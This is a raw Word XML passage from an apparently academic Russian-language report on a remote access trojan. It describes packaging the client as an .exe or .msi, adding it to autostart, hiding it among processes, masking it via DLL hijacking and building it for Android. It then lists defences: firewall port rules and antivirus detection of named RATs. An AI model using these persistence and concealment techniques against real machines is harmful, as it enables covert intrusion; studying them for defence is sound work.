      <w:bookmarkStart w:id="28" w:name="_Toc105065726"/>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00141563">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00141563">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E61F4">
        <w:t>Исполнение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> клиент</w:t>
      </w:r>
      <w:r w:rsidR="008E61F4">
        <w:t>ской программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="4519EDF0" w14:textId="77777777" w:rsidR="00B77291" w:rsidRDefault="00B77291" w:rsidP="00B77291"/>
    <w:p w14:paraId="0EC9ECCD" w14:textId="77777777" w:rsidR="00B77291" w:rsidRDefault="008E61F4" w:rsidP="008E61F4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Из написанного выше, установлено, что для исполнения клиента необходимо наличие </w:t>
      </w:r>
      <w:r w:rsidRPr="008E61F4">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> модулей</w:t>
      </w:r>
      <w:r w:rsidRPr="008E61F4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738E3B6D" w14:textId="77777777" w:rsidR="008E61F4" w:rsidRDefault="008E61F4" w:rsidP="008E61F4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Данное условие сложно выполнить по той причине, что далеко не у каждого клиента установлен непосредственно язык программирования </w:t>
      </w:r>
      <w:r w:rsidRPr="008E61F4">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> либо</w:t>
      </w:r>
      <w:r w:rsidRPr="008E61F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пакетный менеджер </w:t>
      </w:r>
      <w:r w:rsidRPr="008E61F4">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328AC553" w14:textId="77777777" w:rsidR="008E61F4" w:rsidRDefault="008E61F4" w:rsidP="008E61F4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Решением данной проблемы является сборка</w:t>
      </w:r>
      <w:r w:rsidR="00324EA3" w:rsidRPr="00324EA3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00324EA3">
        <w:t>исходного кода с необходимыми модулями</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в исполняемый </w:t>
      </w:r>
      <w:r w:rsidRPr="008E61F4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="008E61F4">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файл (для платформы </w:t>
      </w:r>
      <w:r w:rsidRPr="008E61F4">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="008E61F4">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">с последующим сворачиванием сторонними средствами в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E61F4">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E61F4">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пакет для облегчения установки на вычислительной машине пользователя. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C0DD64" w14:textId="77777777" w:rsidR="008E61F4" w:rsidRDefault="008E61F4" w:rsidP="008E61F4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Созданны</w:t>
      </w:r>
      <w:r w:rsidR="00475850">
        <w:t>й</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняемый файл может быть добавлен в автозагрузку, </w:t>
      </w:r>
      <w:r w:rsidR="00475850">
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">скрыт среди </w:t>
      </w:r>
      <w:r w:rsidR="00475850">
        <w:t xml:space="preserve">исполняемых </w:t>
      </w:r>
      <w:r>
        <w:t>процессов</w:t>
      </w:r>
      <w:r w:rsidR="006A5C0D">
        <w:t xml:space="preserve"> (см. рис 3.1)</w:t>
      </w:r>
      <w:r w:rsidR="00475850">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA0FCE" w14:textId="77777777" w:rsidR="00EB2B7B" w:rsidRPr="00C82D53" w:rsidRDefault="00EB2B7B" w:rsidP="00EB2B7B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013D40CF" w14:textId="77777777" w:rsidR="00156F5C" w:rsidRPr="00C82D53" w:rsidRDefault="00D918E7" w:rsidP="00156F5C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F57FBD0" wp14:editId="6D645ECF">
            <wp:extent cx="5935980" cy="5173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F90D" w14:textId="77777777" w:rsidR="00156F5C" w:rsidRPr="00C82D53" w:rsidRDefault="00156F5C" w:rsidP="00156F5C"/>
    <w:p w14:paraId="68BE35DF" w14:textId="77777777" w:rsidR="004F6A75" w:rsidRDefault="00A86F65" w:rsidP="00A86F65">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00A86F65">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="007A202D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7A202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Исполнение клиентской программы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6425A2A9" w14:textId="77777777" w:rsidR="00792308" w:rsidRDefault="00792308" w:rsidP="00A86F65">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DE0C1B" w14:textId="77777777" w:rsidR="00A86F65" w:rsidRDefault="00A86F65" w:rsidP="00A86F65">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Более продвинутыми средствами маскировки </w:t>
      </w:r>
      <w:r w:rsidR="004C2E9F">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>является</w:t>
      </w:r>
      <w:r w:rsidR="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполнение инструкций клиента из динамически подключаемых библиотек - </w:t>
      </w:r>
      <w:r w:rsidR="00792308" w:rsidRPr="00792308">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidR="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, посредством внедрения их</w:t>
      </w:r>
      <w:r w:rsidR="00792308" w:rsidRPr="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">через </w:t>
      </w:r>
      <w:r w:rsidR="00792308" w:rsidRPr="00792308">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidR="00792308" w:rsidRPr="00792308">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00792308" w:rsidRPr="00792308">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hjacking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00792308" w:rsidRPr="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83320F" w14:textId="77777777" w:rsidR="00415513" w:rsidRPr="00415513" w:rsidRDefault="00792308" w:rsidP="00415513">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>Исходный код клиентской и серверной программ может</w:t>
      </w:r>
      <w:r w:rsidR="003B0395">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> средствами</w:t>
      </w:r>
      <w:r w:rsidRPr="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00792308">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="003B0395">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">компилироваться в </w:t>
      </w:r>
      <w:r w:rsidRPr="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00792308">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>apk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> файлы, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">что, делает исполнение программ на устройствах под управлением </w:t>
      </w:r>
      <w:r w:rsidRPr="00792308">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Android</w:t>
      </w:r>
      <w:r w:rsidRPr="00792308">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="232469E1" w14:textId="77777777" w:rsidR="00415513" w:rsidRPr="00415513" w:rsidRDefault="00415513" w:rsidP="00415513">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc105065727"/>
      <w:r w:rsidRPr="00415513">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0359">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Методы защиты от внедрения и исполнения </w:t>
      </w:r>
      <w:r w:rsidRPr="00415513">
        <w:rPr>
          <w:i/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="46FE9D1A" w14:textId="77777777" w:rsidR="00415513" w:rsidRPr="00415513" w:rsidRDefault="00415513" w:rsidP="00415513">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30DDC969" w14:textId="77777777" w:rsidR="00415513" w:rsidRPr="00415513" w:rsidRDefault="00415513" w:rsidP="00415513"/>
    <w:p w14:paraId="47848840" w14:textId="77777777" w:rsidR="003B0395" w:rsidRDefault="003B0395" w:rsidP="003B0395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Проанализировав принцип работы </w:t>
      </w:r>
      <w:r w:rsidRPr="003B0395">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="0098005B">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="003B0395">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">можно </w:t>
      </w:r>
      <w:r w:rsidR="00E20A87">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">предпринять </w:t>
      </w:r>
      <w:r w:rsidR="0098005B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ряд действий для предотвращения внедрения или исполнения функций клиентской программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426BE78D" w14:textId="77777777" w:rsidR="0098005B" w:rsidRDefault="0098005B" w:rsidP="003B0395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В первую очередь, стоит обратить на обращение клиента к серверу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409EE011" w14:textId="77777777" w:rsidR="00425B32" w:rsidRDefault="0098005B" w:rsidP="00425B32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Для предотвращения отправки ответов клиента серверу можно проверить на наличие открытые порты, и, правилами </w:t>
      </w:r>
      <w:r w:rsidRPr="0098005B">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="0098005B">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>закрыть все нелегитимно открытые порты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A06CFD5" w14:textId="77777777" w:rsidR="004A3859" w:rsidRPr="004A3859" w:rsidRDefault="00425B32" w:rsidP="00425B32">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:tab/>
        <w:t>Порты 0-1023 связаны с наиболее важными и фундаментальными сетевыми службами.</w:t>
      </w:r>
      <w:r w:rsidR="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> Порты 1024-49151 известны как «зарегистрированные порты» и назначаются важным общим службам,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">таким как </w:t>
      </w:r>
      <w:r w:rsidR="004A3859" w:rsidRPr="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US" w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t>OpenVPN</w:t>
      </w:r>
      <w:r w:rsidR="004A3859" w:rsidRPr="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">на порте 1194 или </w:t>
      </w:r>
      <w:r w:rsidR="004A3859" w:rsidRPr="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US" w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidR="004A3859" w:rsidRPr="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A3859" w:rsidRPr="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US" w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="004A3859" w:rsidRPr="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A3859">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="ru-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">на портах 1433 1434. </w:t>
      </w:r>
      <w:r w:rsidR="004A3859">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остальные номера портов известны как «динамические» или «частные» порты. Эти порты не зарезервированы, и любой может использовать их в сети для поддержки определенной службы. Единственная проблема возникает, когда две или более служб одного интерфейса используют один и тот же порт. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625FE82E" w14:textId="77777777" w:rsidR="004A3859" w:rsidRDefault="004A3859" w:rsidP="00425B32">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A3859">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="004A3859">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidRPr="004A3859">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>может использовать как произвольные, начиная с 1024, так и заданные перед компиляцией порты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145B29B2" w14:textId="77777777" w:rsidR="007754EA" w:rsidRDefault="007754EA" w:rsidP="00425B32">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Ещё одним доступным способом защиты является </w:t>
      </w:r>
      <w:r w:rsidR="00753689">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>использование антивирусных средств</w:t>
      </w:r>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00753689">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">большинство популярных </w:t>
      </w:r>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="00146762">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00753689">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">таких как </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cerberus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00753689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>CyberGate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00753689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>DarkComet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00753689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Orcus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> RAT</w:t>
      </w:r>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00753689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>NjRat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00753689">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00753689" w:rsidRPr="00753689">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Venom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00146762">
        <w:t xml:space="preserve"> и другие,</w:t>
      </w:r>
      <w:r w:rsidR="00753689">
        <w:t xml:space="preserve"> занесены в базы данных антивирусов</w:t>
      </w:r>
      <w:r w:rsidR="00146762">
        <w:t xml:space="preserve">. Обновление антивирусного ПО с высокой степенью вероятности позволит обнаруживать и пресекать исполнение </w:t>
      </w:r>
      <w:r w:rsidR="00146762" w:rsidRPr="00146762">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RAT</w:t>
      </w:r>
      <w:r w:rsidR="00146762">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00146762">
        <w:t>объектов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085B443F" w14:textId="77777777" w:rsidR="007754EA" w:rsidRDefault="00146762" w:rsidP="00146762">
      <w:pPr>
        <w:spacing w:after="20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3055C94E" w14:textId="77777777" w:rsidR="007754EA" w:rsidRDefault="007754EA" w:rsidP="007754EA">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc105065728"/>
      <w:r w:rsidRPr="007754EA">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0359">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Методы противодействия защите</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="66187373" w14:textId="77777777" w:rsidR="007754EA" w:rsidRPr="007754EA" w:rsidRDefault="007754EA" w:rsidP="007754EA"/>
    <w:p w14:paraId="5311F2DF" w14:textId="77777777" w:rsidR="007754EA" w:rsidRPr="007754EA" w:rsidRDefault="007754EA" w:rsidP="007754EA"/>
